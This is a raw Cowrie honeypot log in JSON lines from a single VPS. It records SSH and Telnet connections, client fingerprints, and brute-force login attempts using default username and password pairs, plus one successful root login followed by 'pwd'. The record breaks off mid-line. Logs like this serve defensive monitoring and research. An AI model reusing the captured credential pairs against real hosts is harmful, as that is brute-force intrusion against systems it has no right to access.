{"eventid":"cowrie.login.failed","username":"git","password":"123","message":"login attempt [git/123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:41:54.852587Z","src_ip":"82.67.125.95","session":"510f836b5ef7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58880,"dst_ip":"1.2.3.4","dst_port":22,"session":"480c05bc0460","protocol":"ssh","message":"New connection: 212.227.235.229:58880 (1.2.3.4:22) [session: 480c05bc0460]","sensor":"my-vps","timestamp":"2025-08-31T01:41:55.626642Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:41:55.863403Z","src_ip":"212.227.125.160","session":"6c1fe157f02b"}
{"eventid":"cowrie.session.closed","duration":"10.9","message":"Connection lost after 10.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:41:55.864516Z","src_ip":"212.227.125.160","session":"6c1fe157f02b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:41:55.890334Z","src_ip":"82.67.125.95","session":"510f836b5ef7"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:41:56.708321Z","src_ip":"212.227.235.229","session":"480c05bc0460"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:41:56.708982Z","src_ip":"212.227.235.229","session":"480c05bc0460"}
{"eventid":"cowrie.session.closed","duration":12.849021673202515,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:41:57.752263Z","src_ip":"212.227.125.160","session":"bff8d1e340c1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60129,"dst_ip":"1.2.3.4","dst_port":23,"session":"05b959479c28","protocol":"telnet","message":"New connection: 212.227.125.160:60129 (1.2.3.4:23) [session: 05b959479c28]","sensor":"my-vps","timestamp":"2025-08-31T01:42:00.982484Z"}
{"eventid":"cowrie.login.failed","username":"docker","password":"password","message":"login attempt [docker/password] failed","sensor":"my-vps","timestamp":"2025-08-31T01:42:02.506845Z","src_ip":"212.227.235.229","session":"480c05bc0460"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":33748,"dst_ip":"1.2.3.4","dst_port":22,"session":"38679b42b8dc","protocol":"ssh","message":"New connection: 201.148.180.50:33748 (1.2.3.4:22) [session: 38679b42b8dc]","sensor":"my-vps","timestamp":"2025-08-31T01:42:03.771676Z"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:42:04.403430Z","src_ip":"212.227.235.229","session":"480c05bc0460"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:42:04.754503Z","src_ip":"201.148.180.50","session":"38679b42b8dc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:42:04.755208Z","src_ip":"201.148.180.50","session":"38679b42b8dc"}
{"eventid":"cowrie.login.success","username":"root","password":"TUvi1010","message":"login attempt [root/TUvi1010] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:42:09.963401Z","src_ip":"201.148.180.50","session":"38679b42b8dc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:42:12.634639Z","src_ip":"201.148.180.50","session":"38679b42b8dc"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-31T01:42:12.635477Z","src_ip":"201.148.180.50","session":"38679b42b8dc"}
{"eventid":"cowrie.session.closed","duration":12.730135917663574,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:42:13.712531Z","src_ip":"212.227.125.160","session":"05b959479c28"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60343,"dst_ip":"1.2.3.4","dst_port":23,"session":"41a8605404eb","protocol":"telnet","message":"New connection: 212.227.125.160:60343 (1.2.3.4:23) [session: 41a8605404eb]","sensor":"my-vps","timestamp":"2025-08-31T01:42:13.906819Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:42:14.036891Z","src_ip":"201.148.180.50","session":"38679b42b8dc"}
{"eventid":"cowrie.session.closed","duration":"10.3","message":"Connection lost after 10.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:42:14.038340Z","src_ip":"201.148.180.50","session":"38679b42b8dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49948,"dst_ip":"1.2.3.4","dst_port":22,"session":"332434b2368f","protocol":"ssh","message":"New connection: 212.227.125.160:49948 (1.2.3.4:22) [session: 332434b2368f]","sensor":"my-vps","timestamp":"2025-08-31T01:42:17.983596Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:42:18.819584Z","src_ip":"212.227.125.160","session":"332434b2368f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:42:18.820339Z","src_ip":"212.227.125.160","session":"332434b2368f"}
{"eventid":"cowrie.login.failed","username":"docker","password":"password","message":"login attempt [docker/password] failed","sensor":"my-vps","timestamp":"2025-08-31T01:42:21.417803Z","src_ip":"212.227.125.160","session":"332434b2368f"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:42:22.986496Z","src_ip":"212.227.125.160","session":"332434b2368f"}
{"eventid":"cowrie.session.closed","duration":12.828751802444458,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:42:26.735492Z","src_ip":"212.227.125.160","session":"41a8605404eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60561,"dst_ip":"1.2.3.4","dst_port":23,"session":"efd13f95a64d","protocol":"telnet","message":"New connection: 212.227.125.160:60561 (1.2.3.4:23) [session: efd13f95a64d]","sensor":"my-vps","timestamp":"2025-08-31T01:42:26.956154Z"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":49870,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5d4b38e4522","protocol":"ssh","message":"New connection: 102.88.137.80:49870 (1.2.3.4:22) [session: b5d4b38e4522]","sensor":"my-vps","timestamp":"2025-08-31T01:42:38.557163Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:42:38.558133Z","src_ip":"102.88.137.80","session":"b5d4b38e4522"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:42:38.680599Z","src_ip":"102.88.137.80","session":"b5d4b38e4522"}
{"eventid":"cowrie.login.failed","username":"bandit","password":"bandit","message":"login attempt [bandit/bandit] failed","sensor":"my-vps","timestamp":"2025-08-31T01:42:39.213241Z","src_ip":"102.88.137.80","session":"b5d4b38e4522"}
{"eventid":"cowrie.session.closed","duration":12.734548568725586,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:42:39.690624Z","src_ip":"212.227.125.160","session":"efd13f95a64d"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:42:40.340640Z","src_ip":"102.88.137.80","session":"b5d4b38e4522"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60743,"dst_ip":"1.2.3.4","dst_port":23,"session":"9edf08584091","protocol":"telnet","message":"New connection: 212.227.125.160:60743 (1.2.3.4:23) [session: 9edf08584091]","sensor":"my-vps","timestamp":"2025-08-31T01:42:42.902262Z"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":48336,"dst_ip":"1.2.3.4","dst_port":22,"session":"a191fe27c9f4","protocol":"ssh","message":"New connection: 82.67.125.95:48336 (1.2.3.4:22) [session: a191fe27c9f4]","sensor":"my-vps","timestamp":"2025-08-31T01:42:53.117242Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:42:53.118419Z","src_ip":"82.67.125.95","session":"a191fe27c9f4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:42:53.154618Z","src_ip":"82.67.125.95","session":"a191fe27c9f4"}
{"eventid":"cowrie.login.failed","username":"dev1","password":"dev1","message":"login attempt [dev1/dev1] failed","sensor":"my-vps","timestamp":"2025-08-31T01:42:53.338156Z","src_ip":"82.67.125.95","session":"a191fe27c9f4"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:42:54.376442Z","src_ip":"82.67.125.95","session":"a191fe27c9f4"}
{"eventid":"cowrie.session.closed","duration":12.829960107803345,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:42:55.732155Z","src_ip":"212.227.125.160","session":"9edf08584091"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41558,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6c34e3d9d42","protocol":"ssh","message":"New connection: 212.227.235.229:41558 (1.2.3.4:22) [session: d6c34e3d9d42]","sensor":"my-vps","timestamp":"2025-08-31T01:42:57.907833Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:42:58.762507Z","src_ip":"212.227.235.229","session":"d6c34e3d9d42"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:42:58.763466Z","src_ip":"212.227.235.229","session":"d6c34e3d9d42"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42464,"dst_ip":"1.2.3.4","dst_port":23,"session":"6ff2db58b08f","protocol":"telnet","message":"New connection: 212.227.125.160:42464 (1.2.3.4:23) [session: 6ff2db58b08f]","sensor":"my-vps","timestamp":"2025-08-31T01:42:58.971282Z"}
{"eventid":"cowrie.login.failed","username":"docker","password":"password1","message":"login attempt [docker/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T01:43:04.690955Z","src_ip":"212.227.235.229","session":"d6c34e3d9d42"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:43:06.587090Z","src_ip":"212.227.235.229","session":"d6c34e3d9d42"}
{"eventid":"cowrie.session.closed","duration":12.743168830871582,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:43:11.714373Z","src_ip":"212.227.125.160","session":"6ff2db58b08f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42699,"dst_ip":"1.2.3.4","dst_port":23,"session":"f58fe67fb526","protocol":"telnet","message":"New connection: 212.227.125.160:42699 (1.2.3.4:23) [session: f58fe67fb526]","sensor":"my-vps","timestamp":"2025-08-31T01:43:11.910903Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60596,"dst_ip":"1.2.3.4","dst_port":22,"session":"f524ca927cda","protocol":"ssh","message":"New connection: 212.227.125.160:60596 (1.2.3.4:22) [session: f524ca927cda]","sensor":"my-vps","timestamp":"2025-08-31T01:43:19.774187Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:43:20.326997Z","src_ip":"212.227.125.160","session":"f524ca927cda"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:43:20.327958Z","src_ip":"212.227.125.160","session":"f524ca927cda"}
{"eventid":"cowrie.login.failed","username":"docker","password":"password1","message":"login attempt [docker/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T01:43:22.509956Z","src_ip":"212.227.125.160","session":"f524ca927cda"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:43:24.044489Z","src_ip":"212.227.125.160","session":"f524ca927cda"}
{"eventid":"cowrie.session.closed","duration":12.834001541137695,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:43:24.744813Z","src_ip":"212.227.125.160","session":"f58fe67fb526"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42901,"dst_ip":"1.2.3.4","dst_port":23,"session":"e53b2384ea3a","protocol":"telnet","message":"New connection: 212.227.125.160:42901 (1.2.3.4:23) [session: e53b2384ea3a]","sensor":"my-vps","timestamp":"2025-08-31T01:43:24.953002Z"}
{"eventid":"cowrie.session.closed","duration":12.865478277206421,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:43:37.818382Z","src_ip":"212.227.125.160","session":"e53b2384ea3a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43071,"dst_ip":"1.2.3.4","dst_port":23,"session":"481091a97f78","protocol":"telnet","message":"New connection: 212.227.125.160:43071 (1.2.3.4:23) [session: 481091a97f78]","sensor":"my-vps","timestamp":"2025-08-31T01:43:38.040439Z"}
{"eventid":"cowrie.session.closed","duration":"301.1","message":"Connection lost after 301.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:43:39.759222Z","src_ip":"115.190.94.119","session":"1a729f80c6a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46994,"dst_ip":"1.2.3.4","dst_port":22,"session":"7fe55b14eb0c","protocol":"ssh","message":"New connection: 212.227.125.160:46994 (1.2.3.4:22) [session: 7fe55b14eb0c]","sensor":"my-vps","timestamp":"2025-08-31T01:43:47.481521Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-31T01:43:47.483759Z","src_ip":"212.227.125.160","session":"7fe55b14eb0c"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-s